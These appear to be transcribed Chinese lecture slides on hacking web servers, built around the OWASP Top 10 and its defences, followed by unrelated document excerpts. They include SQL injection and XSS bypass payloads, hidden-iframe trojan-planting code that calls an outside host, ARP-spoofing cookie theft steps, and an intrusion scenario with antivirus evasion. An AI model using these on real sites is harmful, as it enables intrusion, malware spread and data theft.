網路攻防戰 之 實務案例分析 個資防護

Size: px
Start display at page:

Download "網路攻防戰 之 實務案例分析 個資防護"

Transcription

1 Hacking Web Servers 資訊工程系所授課講師 : 許振銘協同業師 : 呂守箴

2 補充資料 : OWASP 網站 : OWASP Testing Guide v3 英文版下載處 uide_v3.pdf 簡體中文版下載處 OWASP 测试指南 ( 中文 ).pdf

3 OWASP TOP 10 Web Application Security Risks (2010) A1: 注入弱點 A6: 錯誤或不安全的系統組態 A2: 跨網站腳本攻擊 (XSS) A7: 網址存取控制失當 A3: 身份驗證缺陷與連線階段管理 A8: 未驗證的轉址與轉送 A4: 不安全的直接物件參考 A9: 不安全的加密儲存方式 A5: 跨網站請求偽造攻擊 (CSRF) A10: 傳輸層保護不足 參考資料 :https://www.owasp.org/index.php/top_10

4

5

6 A1: 注入弱點 說明 : 網站應用程式執行來自外部包括資料庫在內的惡意指令, SQL Injection 與 Command Injection 等攻擊包括在內 因為駭客必須猜測管理者所撰寫的方式, 因此又稱 駭客的填空遊戲

7 A1: 注入弱點 防護建議 : 使用預存程序, 例如 : Java PreparedStatement(),.NET SqlCommand(), OleDbCommand(), PHP PDO bindparam() 使用 Stored Procedures 嚴密的檢查所有輸入值使用過濾字串函數過濾非法的字元控管錯誤訊息只有管理者可以閱讀控管資料庫及網站使用者帳號權限為何

8

9

10 SQL Injection 利用 引起的原因為網頁程式設計師在撰寫 asp 或 php 程式的時候, 對呼叫 (ADO 連線 ) 後端資料庫的帳號權限太大, 在加上對特殊字串以及語法沒有過濾或者過濾不完全而導致的 其最主要的攻擊目標為資料庫, 以取得下列資訊為主 : 獲取資料庫帳號及密碼獲取作業系統帳號及密碼利用 XP_CmdShell 執行 DOS 指令猜測網頁實體路徑來進行換首頁或上傳 / 下載文件上傳網頁木馬並植入後門

11 SQL 條件式語法漏洞 主要出現在登入帳號的 asp 或 php 程式上, 利用這個漏洞就可以不需要帳號密碼進入管理畫面 主要為網頁程式設計的瑕疵 : 沒有對單引號 或雙引號 '' 進行過濾 SQL 條件式 and or 的邏輯沒有考慮 SQL 語法的 where 子句所傳入的變數沒有檢查 SQL 語法中 - - 是表示該符號之後的語法或參數變成註解 語法 : or = or a'or'1=1- - 'or1=1- - ''or1=1- - or1=1- - 'ora ='a or = a = a ')or( a ='a

12 [hacker][web][01] 執行 IE 瀏覽器 Vote 投票系統使用語法觀察結果 執行 IE 瀏覽器 部門薪資查詢程式使用語法觀察結果

13 網頁應用程式語法 : 有問題版 sql_cmd = "select * from mydatabase where id='" & Request("id") & "' and passwd='" & Request("passwd") & "' 傳入惡意語法後 sql_cmd = "select * from mydatabase where id='" 'or 1=1 -- "' and passwd='" & Request("passwd") & "' 則變成前面的 where 條件為 1=1 而後面的 password 則因 - - 變成註解, 所以就不用密碼可進入

14 網頁應用程式語法 : 修正版 以程式設計的觀點來看, 將表單或查詢字串直接帶入 SQL 語法, 是一切弊病的源頭, 要徹底排除 SQL 資料隱碼攻擊, 必須從根源對症下藥 也就是必須在取得表單資料後, 針對單引號進行過濾, 然後再組合為 SQL 語法, 例如 : sql_cmd = "select * from mydatabase where id='" & Request("id") & "' and passwd='" & Request("passwd") & "'" 應該改為 myid = Replace(Request("id"),"'","'+chr(34)+'") mypwd = Replace(Request("passwd"),"'","'+chr(34)+'") sql_cmd = "select * from mydatabase where id='" & myid & "' and passwd='" & mypwd & "'"

15 SQL Injection 相關參考網址 SQL Injection ( 資料隱碼 ) 駭客的 SQL 填空遊戲 資料隱碼 SQL Injection 的因應與防範之道 ASCII 碼對照表 SQL Injection 檢測工具 ( 無殺傷力 )

16 [server][web][02] 觀察 IIS SQL server ASP 網頁 [hacker][web][02] 執行 IE 瀏覽器 部門薪資查詢程式使用語法 找出資料庫所有欄位資訊異動欄位資料取得資料庫控制權 觀察結果

17 執行整合式掃描工具 BT5 webshag Windows Wikto Nikto Netsparker OWASP Zed Attack Proxy(ZAP) 觀察結果

18

19

20 A2: 跨網站腳本攻擊 (XSS) 說明 : 網站應用程式直接將來自使用者的執行請求送回瀏覽器執行, 使得攻擊者可擷取使用者的 Cookie 或 Session 資料而能假冒直接登入為合法使用者

21 A2: 跨網站腳本攻擊 (XSS) 防護建議 : 檢查頁面輸入數值輸出頁面做 Encoding 檢查使用白名單機制過濾, 而不單只是黑名單 PHP 使用 htmlentities 過濾字串.NET 使用 Microsoft Anti-XSS Library

22 XSS 利用 Cross Site Scripting(XSS) 跨網站功擊 : XSS 產生的原因是由於網頁程式設計師在撰寫程式時, 對於一些變數沒有充份過濾, 直接把使用者所送出的資料送往 Web Sever 執行 這樣的程式流程造成攻擊者可以送出一些特別製造的 Script 語法, 只要成功送往後端執行成功, 便可達成如 : 竊取 cookie 植入網頁木馬等原本不存在的 功能

23 [hacker][web][03] 執行 IE 瀏覽器 Vote 投票系統 IE 瀏覽器 MYpower 論壇使用語法觀察結果

24 XSS 的探測和繞過過濾 基本檢測語法 : <script>alert( xss )</script> 如果 <script> 被過濾, 則改用 <img src=javascript:alert( xss )> 如果 javascript: 被過濾, 則用 16 進位的值取代一些關鍵字 <img src= javascrip&#116&#58alert(/xss/) > 也可用空白字元 Tab 添加 <img src= javas cript:alert(/xss/) width=0> 或者用語法的事件與屬性來避免關鍵字被攔截 <img src= # onerror=alert(/xss/)> <img src= # style= xss:expression(alert( xss )); > 例如 :Yahoo Mail 的 XSS 語法 ( 已修正 ) <STYLE onload= alert( cookies exploit! );alert(document.cookie) >

25 網站 網頁掛馬語法 框架掛馬 : <iframe src= 木馬網址 width=0 height=0></iframe> JScript 文件掛馬 : 首先將以下語法存檔為 xxx.js 然後將此文件利用各種方式上傳到目標處 document.write("<iframe width='0' height='0' src=' 木馬網址 '></iframe>"); 最後 JScript 掛馬的語法為 : <script language=javascript src=xxx.js></script> JScript 變型加密 : <SCRIPT language= JScript.Encode src=http://www.xxx.com/muma.txt></script> muma.txt 可改成任何附檔名 body 掛馬 : <body onload="window.location=' 木馬網址 ';"></body> 隱藏掛馬 : top.document.body.innerhtml = top.document.body.innerhtml + '\r\n<iframe src="http://www.xxx.com/muma.htm/"></iframe>';

26 CSS 中掛馬 : 先將製作好的 muma.js 先利用各種方式上傳至目標處 body { background-image: url('javascript:document.write("<script src=http://www.xxx.net/muma.js></script>")')} JAVA 掛馬 : <SCRIPT language=javascript> window.open (" 木馬網址 ","","toolbar=no,location=no,directories=no,status=no,menubar=no,scro llbars=no,width=1,height=1"); </script> 圖片偽裝 : <html> <iframe src=" 網馬網址 " height=0 width=0></iframe> <img src=" 圖片網址 "> </html> 偽裝呼叫 : <frameset rows="444,0" cols="*"> <frame src=" 開啟的網頁 " framborder="no" scrolling="auto" noresize marginwidth="0"margingheight="0"> <frame src=" 網馬網址 " frameborder="no" scrolling="no" noresize marginwidth="0"margingheight="0"> </frameset> 欺騙超連結網址手法 : <a href="http://www.xyz.com( 迷惑他人超連結網址, 故意顯示這個網址卻連向木馬網址 )" onmouseover="www_163_com(); return true;"> 網頁要顯示的內容 </a> <SCRIPT Language="JavaScript"> function www_xyz_com () { var url=" 真正連的網頁木馬網址 "; open(url,"newwindow","toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=no,resizable=no,copyhistory=y es,width=800,height=600,left=10,top=10"); } </SCRIPT>

27 XSS 相關參考網址 Cross Site Scripting questions and answers Apache Cross Site Scripting Info How to prevent cross-site scripting security issues Information on Cross-Site Scripting Security Vulnerability Microsoft Anti-Cross Site Scripting Library V1.0

28

29 A3: 身份驗證缺陷與連線階段 管理 說明 : 網站應用程式中自行撰寫的身分驗證相關功能有缺陷 例如, 登入時無加密 SESSION 無控管 Cookie 未保護 密碼強度過弱等等 網站並沒有使用 SSL / TLS 加密, 使用者在使用一般網路或者無線網路時, 被攻擊者使用 Sniffer 竊聽取得 User ID 密碼 SESSION ID 等, 進一步登入該帳號

30 A3: 身份驗證缺陷與連線階段 管理 防護建議 : 使用完善的 COOKIE / SESSION 保護機制不允許外部 SESSION 登入及修改資訊頁面使用 SSL 加密設定完善的 Timeout 機制驗證密碼強度及密碼更換機制

31 竊取已驗證的 Facebook Cookies 1. 使用 nmap 確認閘道端 ( 無線網路基地台 ) 的 IP 所在地 2. 使用 arpspoof 進行 ARP 欺騙來讓原本要從無線基地台出去的被害人封包先轉向到攻擊者的電腦 3. 開啟 Firefox 加裝附加元件 Greasemonkey 來執行 cookieinjector 的 script 4. 瀏覽 facebook 網站 ( 但不要登入 ) 確認可以觸發 script 5. 啟動 wireshark 開始側錄從被害人導流過來的封包, 並設定過濾條件只需要 FB 的 cookie ( 該 cookie 就會包含該被害人的帳號與密碼資料 ) 6. 複製被害人封包內的 Text 資料, 並將其貼上的 Firefox 上等待觸發的 script 附加元件 7. 重新整理後 Firefox 就會將原本被害人封包內的帳號密碼等身份資料填入瀏覽器, 偽冒變成對方的身份了

32

33

34 A4: 不安全的直接物件參考 說明 : 攻擊者利用網站應用程式本身的檔案讀取功能任意存取檔案或重要資料 進一步利用這個弱點分析網站原始碼 系統帳號密碼檔等資訊, 進而控制整台主機 例如 : ot.ini

35 A4: 不安全的直接物件參考 防護建議 : 避免將私密物件直接暴露給使用者 驗證所有物件是否為正確物件 使用 Index / Hash 等方法, 而非直接讀取檔案

36

37 A5: 跨網站請求偽造攻擊 (CSRF) 說明 : 已登入網站應用程式的合法使用者執行到惡意的 HTTP 指令, 但網站卻當成合法需求處理, 使得惡意指令被正常執行 舉例來說, 攻擊者在網站內放置了, 受害者讀取到此頁面之後, 就會去 server.com 主機執行 send.asp 惡意行為 例如 Web 2.0 時代的社交網站等等, 都是 CSRF 攻擊的天堂

38 A5: 跨網站請求偽造攻擊 (CSRF) 防護建議 : 確保網站內沒有任何可供 XSS 攻擊的弱點在 Input 欄位加上亂數產生的驗證編碼在能使用高權限的頁面, 重新驗證使用者禁止使用 GET 參數傳遞防止快速散佈使用 Captcha 等技術驗證是否為人為操作

39

40

41 A6: 錯誤或不安全的系統組態 說明 : 系統的安全性取決於應用程式 伺服器 平台的設定 因此所有設定值必須確保安全, 避免預設帳號 密碼 路徑等 甚至被 Google Hacking 直接取得攻擊弱點

42 A6: 錯誤或不安全的系統組態 防護建議 : 軟體 作業系統是否都有更新到最新版本? 是否都有上最新 Patch? 不需要的帳號 頁面 服務 連接埠是否都有關閉? 預設密碼是否都有更改? 安全設定是否都完備? 伺服器是否都有經過防火牆等設備保護? 各種設備 系統的預設密碼, 都可以在網路上找到一些整理資料

43

44 使用可以上網的電腦 觀察預設密碼

45

46

47

48 A7: 網址存取控制失當 說明 : 網頁因為沒有權限控制, 使得攻擊者可透過網址直接存取能夠擁有權限或進階資訊的頁面 例如管理介面 修改資料頁面 個人機敏資訊頁面洩漏等等 舉例來說, /admin /backup /logs /phpmyadmin /phpinfo.php /manage 這些都是常見的路徑及檔案 攻擊者只要猜測到, 就可以操控主機

49 A7: 網址存取控制失當 防護建議 : HTTP Service 直接限制來源 IP 使用防火牆阻擋密碼授權加密頁面網站架構最佳化

50

51 爆庫法取得資料庫 名詞解釋 : 原為大陸用語是指利用強行的手段, 例如 : 在網址列添加特殊字串或路徑, 使目標網站的資料庫實體路徑暴露出來, 進而成功下載該資料庫, 取得帳號密碼等權限之過程 常見手法 : 利用論壇套件其資料庫均固定放至於某 虛擬目錄 中之特性, 輸入關鍵字後下載 ( 註 : 以 access 型態之資料庫居多 ) 把網址列中的 / 換成 %5c 然後送出該網址, 就可以在 Web Server 的錯誤訊息中得到資料庫的實體路徑 註 : 目前只要更新使用新版的論壇套件, 幾乎都已經修正相關弱點

52 論壇 DB 爆庫 : 原理 Access 資料庫的儲存隱患 : 在 ASP+Access 應用系統中, 如果能獲得或猜到 Access 資料庫的儲存路徑和資料庫名稱, 則該資料庫就可以被下載到本地 例如 : 對於線上書店的 Access 資料庫, 人們一般命名為 book.mdb store.mdb 等, 而存儲的路徑一般為 URL/database 或乾脆放在根目錄 URL/ 之下 這樣, 只要在瀏覽器地址欄中輸入網址 : URL/database/store.mdb, 就可以輕易地把 store.mdb 下載到本地的機器中 Access 資料庫的解密隱患 : 由於 Access 資料庫的加密機制非常簡單, 所以即使資料庫設置了密碼, 解密也很容易 由此可見, 無論是否設置了資料庫密碼, 只要資料庫被下載, 其資訊就沒有任何安全性可言了

53

54 Dvbbs 論壇套件爆庫 取得 mdb 後 計算 admin 的 md5 密碼

55 [hacker][web][04] 執行 Google hacking dvbbs7 mdb site:tw IE 瀏覽器使用語法下載資料庫觀察結果

56

57 網際網路 : 外洩管道 : 中毒 : 木馬程式側錄

58 論壇 DB 爆庫 : 解決方案 非常規命名法 : 不要簡單地命名為 book.mdb 或 store.mdb, 而是要起個非常規的名字, 例如 :faq19jhsvzbal.mdb, 再把它放在如./akkjj16t/kjhgb661/acd/avccx55 之類的深層目錄下 使用 ODBC 資料來源 : 使用 ODBC 資料來源, 不要把資料庫名稱直接寫在 ASP 程式碼中, 例如 : DBPath = Server.MapPath(./akkjj16t/kjhgb661/acd/avccx55/faq19jhsvzbal.mdb ) conn.open driver={microsoft Access Driver (*.mdb)}; dbq= & DBPath 改成 : conn.open ODBC-DSN 名稱 就不會發生這樣的問題了

59 在 IIS 的設定 : 將放置 Access 資料庫的資料夾 ( 或虛擬目錄 ) 給予 寫入 但不要給予 讀取 的權限即可, 如此一來, 就算知道儲存路徑和資料庫名稱, 一樣無法從 Web 下載 在主目錄 應用程式設定 應用程式對應 新增 執行檔 : C:\WINNT\System32\inetsrv\ism.dll 副檔名 :.mdb 限制於 :GET,POST ( 缺點 : 以後要編修 Access 資料庫, 很容易忘記有鎖權限或鎖副檔名 )

60

61 %5c 路徑爆庫 : 原理 它不是網頁本身的漏洞, 而是利用了 IIS 解碼方式中的一個特性, 如果 IIS 安全設定不周全, 而網頁設計者及管理者未考慮 IIS 錯誤時, 就會被人利用 為何要用 "%5c"? 實際上它是 "\" 的十六進位代碼, 也就是 "\" 的另一種表示法 基本上 IE 會自動在網址列就把 "\" 轉變成 "/" 的符號, 使得瀏覽到同一個網址 但是, 當我們把 "/" 換成十六進位寫法 "%5c" 時,IE 卻不會對此符號進行轉換, 問題正是出在這裡

62 一個典型的 conn.asp 連線語法中如下 :DBPath = Server.MapPath("db/dsvote.mdb") 當 瀏覽呼叫 conn.asp 時, 就會在 IIS 解析成 /vote\votelist.asp 在 IIS 中, / 和 \ 代表著不同的意義, 遇到了 \ 時, 認為它已經到了根目錄所在的實體路徑便不再往上層解析, 於是 ASP 就會出錯將網站的完整的實體路徑加在錯誤訊息裡 :'C:\Inetpub\wwwroot\STORE\mood#.asa 註 : 將 mood#.asa 改名為 mood.mdb

63

64 投票程式爆庫 取得 mdb 後 計算管理員的 md5 密碼

65 [hacker][web][05] 執行 Google hacking dvbbs7 mdb site:tw IE 瀏覽器使用語法下載資料庫觀察結果

66

67 %5c 路徑爆庫 : 解決方案 修改程式 : 在 conn.asp 檔中呼叫資料庫語法之後要加上 On Error Resume Next 的語法, 它的意思是出錯後, 繼續執行下面語法, 也就是不理會出錯, 當然就不會給出資料庫的錯誤資訊了 修改 Web Server 回報錯誤的畫面 : 在 IIS 內的虛擬目錄 -> 內容 -> 自訂錯誤 -> 選擇錯誤編號 -> 編輯內容 換到預設的網頁即可

68

69

70 A8: 未驗證的轉址與轉送 網頁應用程式經常將使用者 Forward 或 Redirect 至其他頁面或網站, 沒有驗證的機制 攻擊者可將受害者導向至釣魚網站或惡意網站, 甚至存取受限制的資源 例如 :

71 A8: 未驗證的轉址與轉送 防護建議 : 非必要時避免使用 Redirect 及 Forward 驗證導向位置及存取資源是合法的

72 Cookie 欺騙 Cookie 記錄著使用者的帳戶 ID 密碼之類的訊息, 如果在網上傳遞, 通常使用的是 MD5 方法加密 這樣經由加密處理後的訊息, 即使被網路上一些別有用心的人截獲, 也看不懂, 因為他看到的只是一些無意義的字母和數字 然而, 現在遇到的問題是, 截獲 Cookie 的人不需要知道這些字串的含義, 他們只要把別人的 Cookie 向伺服器提交, 並且能夠通過驗證, 他們就可以冒充受害人的身份, 登陸網站 這種方法叫做 Cookie 欺騙 手法 : 截獲他人 Cookie 內的帳號與密碼獲取權限, 搭配其它手法進行 掛馬 等更進一步攻擊

73

74

75

76 A9: 不安全的加密儲存方式 說明 : 網站應用程式沒有對敏感性資料使用加密 使用較弱的加密演算法或將金鑰儲存於容易被取得之處 加密演算法是安全防護的最後一道防線, 當駭客取得了帳號密碼, 可以簡單的使用一些破解軟體甚至線上服務進行破解 例如 Cain & Abel,MD5 Reverse Lookup 等

77 A9: 不安全的加密儲存方式 防護建議 : 使用現有公認安全的加密演算法 減少使用已有弱點的演算法, 例如 MD5 / SHA-1, 甚至更簡單的加密法 安全的保存私鑰

78

79 A10: 傳輸層保護不足 說明 : 網頁應用程式未在傳輸機敏資訊時提供加密功能, 或者是使用過期 無效的憑證, 使加密不可信賴 例如 : 攻擊者竊聽無線網路, 偷取使用者 cookie; 網站憑證無效, 使用者誤入釣魚網站

80 A10: 傳輸層保護不足 防護建議 : 盡可能的使用加密連線 Cookie 使用 Secure Flag 確認加密憑證是有效並符合 domain 的後端連線也使用加密通道傳輸

81 [hacker][web][06] 執行 攻擊前準備 漏洞型木馬 放置跳板 IE 瀏覽器 入侵過程中 Sniffer 取得帳號 上傳網頁型木馬 掛馬 觀察結果

82 模擬案例 :JS 與論壇掛馬 侵過程 目標 : 入 攻陷 XYZ 公司使該公司之客戶植入木 馬, 完成後竊取個資 觀察 : 該公司除 XYZ 網站外仍在同台 Web Server 中並有架設 Dvbbs 論壇

83

84 模擬案例 :JS 與論壇掛馬 侵過程 入侵前準備 : 入 製作 MS MS MS 的 Exploits 程式來呼叫木馬 於 JavaScript 中撰寫 document.write( <iframe src= 存放 Exploits 的網址 width=0 height=0></iframe> ); 並存檔為 123.js 來呼叫 Exploits 將 123.js 檔案進行變型及加密來避免被防毒軟體查殺 最後將 MS MS MS 的 Exploits 程式及製作好的 123.js 檔案放置於 之跳板網站內 Muma 的目錄中備用

85 模擬案例 :JS 與論壇掛馬 侵過程 入侵中過程 : 入 利用 Sniffer 技巧於 Dvbbs 論壇中截獲輸入於該論壇的 Cookie 利用該 Cookie 內儲存之帳號與密碼所取得之權限, 搭配論壇上傳程式, 將 WebShell (windows.asp) 上傳至該台 Web Server 的論壇目錄中 於 中確認 WebShell (windows.asp) 已經成功傳入 目的是利用存放於 Dvbbs 論壇中的 WebShell 來將 XYZ 公司的網站掛馬

86

87 模擬案例 :JS 與論壇掛馬 侵過程 入侵中過程 : 撰寫掛馬語法 <script language=javascript src='http:// /muma/123.js'></script> 入 為避免存放 123.js 的跳板網站 URL 網址被阻擋, 將該網址進行 URL 編碼來逃避偵測 <script language=javascript src='http://%31%39%32%2e%31%36%38%2e%31%32%33%2e%31%30%31%2f%6d%75 %6D%61/123.js' > </script> 利用 WebShell (windows.asp) 將語法掛馬後, 查看 XYZ 公司網頁 HTML 原始碼是否有被異動

88 模擬案例 :JS 與論壇掛馬 侵過程 入侵後感染 : 入 當使用者瀏覽 XYZ 公司的網站後, 變會觸發 HTML 內的掛馬語法 感染流程 : URL 編碼的掛馬語法 轉換 跳板網站中的 123.js 解析 JS 內變型及加密的 Exploits 程式網址 Exploits 程式網址內的木馬程式 植入 還原

89 WebShell 流程 駭客 知名的官方網站 [ 入侵後上傳 ] Webshell ( 網頁木馬 ) 不知情的一般使用者 首頁 [ 掛馬 ] 將首頁或其他網頁植入 <ifrme> 隱藏框架引導到跳版網站 跳版網站 木馬 掛馬的網頁

90 手法探討 : 製造相關的木馬並放置在跳板網址主機上 製造觸發 MS MS MS 漏洞的語法 尋找具有 SQL Server 漏洞或程式瑕疵上傳 ASP 網馬 (Web Shell) 利用 Web Shell 將所屬網站褂上 <iframe> 等之惡意連結 缺點 : Server 端及 Client 端均須利用很多漏洞, 如果不是管理者太粗心, 不會這麼剛好都中獎 修正相關利用到的漏洞之後該手法就沒效了

91 進階偽裝 : 首先將測試的 123.exe 上傳到 dropbox 並偽裝成超連結下載

92 測試語法 : https://dl.dropboxusercontent.com/s/courq4778ipotrw /123.exe?token_hash=AAGJkniXZ56_JdKagTWdIWAHfHlJ B_rSXa1qNz_YZf-DGw&dl=1

93 網址編碼 :

94 短網址 :

95 QR Code:

96

97

98

99

100 其它

101 論壇套件漏洞利用 由於 asp 或 php 簡單易學, 所以網路常常可找尋到相關免費的程式架設論壇網站 但由於安裝程式的管理者常忽略需要修改原始設定及安全性選項, 使得依照 預設值 ( 瘋狂按下一步就會裝好 ) 的資料便可取得該論壇權限, 進而利用 社交工程 取得個人資料 常利用手法 : Cookie 欺騙爆庫法 : 論壇 DB 爆庫爆庫法 :%5c 路徑爆庫 SQL Injecion XSS 惡意超連結至網頁木馬 DDoS

102 其它套件路徑暴露 本地原產 : ANN 公告系統 : For Unix/Linux, Apache + php + mysql ( 典型的 LAMP) 是一個用 PHP 撰寫的公告程式, 主要用來發佈公告, 作者是 Charles Nextime 因作者本身也是教育從業人員, 所以廣受各教育單位使用該 ANN 公告套件 目前最終版 : V1.29 ( 已不再更新 )

103

104 其它套件路徑暴露 : 原因 於該 index.php 程式碼中的判斷式 if (isset($nuke_dir) && $usenuke == 1) { } include("$nuke_dir/mainfile.php"); include("$nuke_dir/header.php"); 指定了 include 的檔案, 這時只要不按照它的邏輯, 即可使該 php 程式發生錯誤, 顯示檔案路徑

105

106 其它套件路徑暴露 : 解決方案 修正該公告套件為最終版 修正該公告套件的程式語法 在 php.ini 文件中將下列參數關閉 global_registers = off allow_url_fopen = 0 修改 Apache 遇到 php 程式錯誤時出現的錯誤畫面 例如 : 有任何錯誤都導向一個固定的畫面 註 : 該公告套件於 Index.php 有暴露路徑漏洞 log.inc.php 有 RemoteFileInclude(RFI) 遠端文件引入漏洞, 可利用它植入 WebShell

Microsoft PowerPoint - Web入侵+手機安全_講義.ppt [相容模式]

Microsoft PowerPoint - Web入侵+手機安全_講義.ppt [相容模式] 網路攻防戰之 Web 2.0 網站手法 與防範 大綱 Web Server 入侵手法 常見的漏洞利用介紹 網頁木馬簡介 論壇套件漏洞介紹 SQL Injection & XSS 手法介紹 Web Server 防禦策略 駭客攻擊 Web 之阻擋方式 惡意連結網站清單 建置社群 web2.0 網站之注意事項 Web Server 入侵手法 Microsoft 漏洞利用 網頁木馬 論壇套件漏洞利用 SQL

More information

投影片 1

投影片 1 資料庫管理程式 ( 補充教材 -Part2) 使用 ADO.NET 連結資料庫 ( 自行撰寫程式碼 以實現新增 刪除 修改等功能 ) Private Sub InsertButton_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles InsertButton.Click ' 宣告相關的 Connection

More information

一 個 SQL Injection 實 例 的 啟 示 頁 2 / 6 因 此, 在 知 名 網 站 上 看 到 SQL Injection, 讓 人 驚 心, 卻 不 意 外 網 站 專 案 外 包 是 目 前 業 界 的 常 態, 而 在 價 格 取 勝 的 制 度 下, 低 價 得 標 的 S

一 個 SQL Injection 實 例 的 啟 示 頁 2 / 6 因 此, 在 知 名 網 站 上 看 到 SQL Injection, 讓 人 驚 心, 卻 不 意 外 網 站 專 案 外 包 是 目 前 業 界 的 常 態, 而 在 價 格 取 勝 的 制 度 下, 低 價 得 標 的 S 一 個 SQL Injection 實 例 的 啟 示 頁 1 / 6 你 的 網 站 在 裸 奔 嗎? 一 個 SQL Injection 實 例 的 啟 示 作 者 : 李 明 儒 SQL Injection( 資 料 隱 碼 攻 擊 ) 問 題 早 就 不 是 什 麼 新 聞, 但 前 陣 子 在 一 個 頗 具 知 名 度 的 活 動 網 站 上, 赫 然 發 現 它 大 刺 刺 地 現 身!

More information

2016 勒索軟體白皮書

2016 勒索軟體白皮書 Botnet Botnet 1 1 2 2 5 5 6 9 10 11 11 11 12 12 12 12 12 12 13 14 2016 1989 AIDS AIDS C 189 2005 2006 TROJ_CRYPZIP.A 2011 TROJ_RANSOM.QOWA 12 2012 REVETON 2013 Cryptolocker Cryptolocker AES RSA Cryptolocker

More information

Microsoft Word - SPEC-20130418

Microsoft Word - SPEC-20130418 ( 初 稿 2013.04.18) 中 央 研 究 院 經 濟 研 究 所 全 球 資 訊 網 站 改 版 建 置 案 建 議 書 徵 求 說 明 文 件 目 次 壹 專 案 概 述... 2 一 專 案 名 稱... 2 二 專 案 目 標... 2 三 專 案 範 圍... 2 四 專 案 時 程... 2 五 現 況 說 明... 3 貳 專 案 需 求... 3 一 網 站 軟 體 開 發

More information

Microsoft Word - A201101-1519.doc

Microsoft Word - A201101-1519.doc 5 10 15 20 25 30 基 于 ASP+ACCESS 的 辽 宁 工 程 技 术 大 学 考 试 网 的 设 计 与 开 发 董 强 1, 宋 喜 义 2 2**, 黄 培 泉 (1. 辽 宁 工 程 技 术 大 学 安 全 科 学 与 工 程 学 院, 辽 宁 阜 新 123000; 2. 辽 宁 工 程 技 术 大 学 实 验 实 训 中 心, 辽 宁 阜 新 123000) 摘 要

More information

XXXXXXXX http://cdls.nstl.gov.cn 2 26

XXXXXXXX http://cdls.nstl.gov.cn 2 26 [ ] [ ] 2003-7-18 1 26 XXXXXXXX http://cdls.nstl.gov.cn 2 26 (2003-7-18) 1...5 1.1...5 1.2...5 1.3...5 2...6 2.1...6 2.2...6 2.3...6 3...7 3.1...7 3.1.1...7 3.1.2...7 3.1.2.1...7 3.1.2.1.1...8 3.1.2.1.2...10

More information

Contents 1. IPSIDS...1... 19 2....2 IT... 21 3....2 4....3 FAQ... 26 5. 21 CISP...3 6. IPS...3 7. 2008...4 8. 2008...4...6...7 IPS Web...9...13...14...15 TOP10...16... 28... 31... 33... 37... 40... 42...

More information

Microsoft Word - WebGoat用户指南-beta2.doc

Microsoft Word - WebGoat用户指南-beta2.doc 目 录 序 言 :WebGoat 中 文 概 述... 3 目 标... 3 概 要... 3 未 来 发 展... 3 下 载... 4 发 行 版... 4 WebGoat 5.2 标 准 版... 4 WebGoat 5.2 开 发 版 ( 位 于 Sourceforge)... 4 演 示 解 决 方 案... 4 演 示 视 频 链 接... 5 项 目 贡 献 者... 5 1. Webgoat

More information

13 根 据 各 种 网 络 商 务 信 息 对 不 同 用 户 所 产 生 的 使 用 效 用, 网 络 商 务 信 息 大 致 可 分 为 四 级, 其 中 占 比 重 最 大 的 是 ( A ) A 第 一 级 免 费 信 息 B 第 二 级 低 收 费 信 息 C 第 三 级 标 准 收 费

13 根 据 各 种 网 络 商 务 信 息 对 不 同 用 户 所 产 生 的 使 用 效 用, 网 络 商 务 信 息 大 致 可 分 为 四 级, 其 中 占 比 重 最 大 的 是 ( A ) A 第 一 级 免 费 信 息 B 第 二 级 低 收 费 信 息 C 第 三 级 标 准 收 费 助 理 电 子 商 务 考 试 真 题 试 题 第 一 部 分 : 理 论 部 分 一 单 项 选 择 题 1 ( B ) 是 信 息 系 统 的 核 心 组 成 部 分 A 逻 辑 模 型 B 数 据 库 C 概 念 模 型 D 以 上 全 部 2 ping www.163.com -t 中 参 数 t 的 作 用 是 :( A ) A 进 行 连 续 测 试 B 在 新 窗 口 中 显 示 C

More information

目 錄 第 一 章 weberp 簡 介... 6 第 一 節 概 述... 6 第 二 節 安 全 性... 7 第 三 節 功 能... 7 一 銷 售 及 訂 單... 7 二 稅... 8 三 應 收 帳 款... 8 四 存 貨... 8 五 購 買... 9 六 應 付 帳 款... 9

目 錄 第 一 章 weberp 簡 介... 6 第 一 節 概 述... 6 第 二 節 安 全 性... 7 第 三 節 功 能... 7 一 銷 售 及 訂 單... 7 二 稅... 8 三 應 收 帳 款... 8 四 存 貨... 8 五 購 買... 9 六 應 付 帳 款... 9 東 吳 大 學 企 研 所 資 訊 管 理 期 末 報 告 weberp 使 用 說 明 書 指 導 教 授 : 尚 榮 安 教 授 第 一 組 童 偉 哲 01353025 劉 彥 澧 01353028 史 璦 禎 01353031 吳 采 紋 98153143 1 目 錄 第 一 章 weberp 簡 介... 6 第 一 節 概 述... 6 第 二 節 安 全 性... 7 第 三 節 功

More information

epub 61-2

epub 61-2 2 Web Dreamweaver UltraDev Dreamweaver 3 We b We b We Dreamweaver UltraDev We b Dreamweaver UltraDev We b We b 2.1 Web We b We b D r e a m w e a v e r J a v a S c r i p t We b We b 2.1.1 Web We b C C +

More information

Microsoft PowerPoint _木馬入侵_講義.ppt [相容模式]

Microsoft PowerPoint _木馬入侵_講義.ppt [相容模式] 網路攻防戰 之 木馬入侵大揭秘 講師 呂守箴 大綱 攻擊第一招 : 木馬產生術 為什麼會有木馬病毒? 類型一 : 原生型木馬 類型二 : 漏洞型木馬 類型三 : 網頁木馬 攻擊第二招 : 避過防毒軟體的方式 木馬與病毒的偽裝術 攻擊第三招 : 木馬傳送的手法與利用的管道 郵件社交工程的病毒傳輸方式 隨身裝置 : 智慧型手機與平板電腦的病毒 防禦大絕招 : 防制手段 常見防毒與防間諜軟體的應用 攻擊第一招

More information

C6_ppt.PDF

C6_ppt.PDF C01-202 1 2 - (Masquerade) (Replay) (Message Modification) (Denial of Service) - ( ) (Eavesdropping) (Traffic Analysis) 8 1 2 7 3 6 5 4 3 - TCP SYN (SYN flood) Smurf Ping of Death LAND Attack Teardrop

More information

天津天狮学院关于修订2014级本科培养方案的指导意见

天津天狮学院关于修订2014级本科培养方案的指导意见 目 录 天 津 天 狮 院 关 于 修 订 2014 级 本 科 培 养 方 案 的 指 导 意 见...1 金 融 类 专 业...9 金 融 专 业 培 养 方 案...9 保 险 专 业 培 养 方 案...14 人 力 资 源 管 理 专 业 培 养 方 案...19 劳 动 与 社 会 保 障 专 业 培 养 方 案...24 工 商 管 理 类 专 业...29 市 场 营 销 专 业

More information

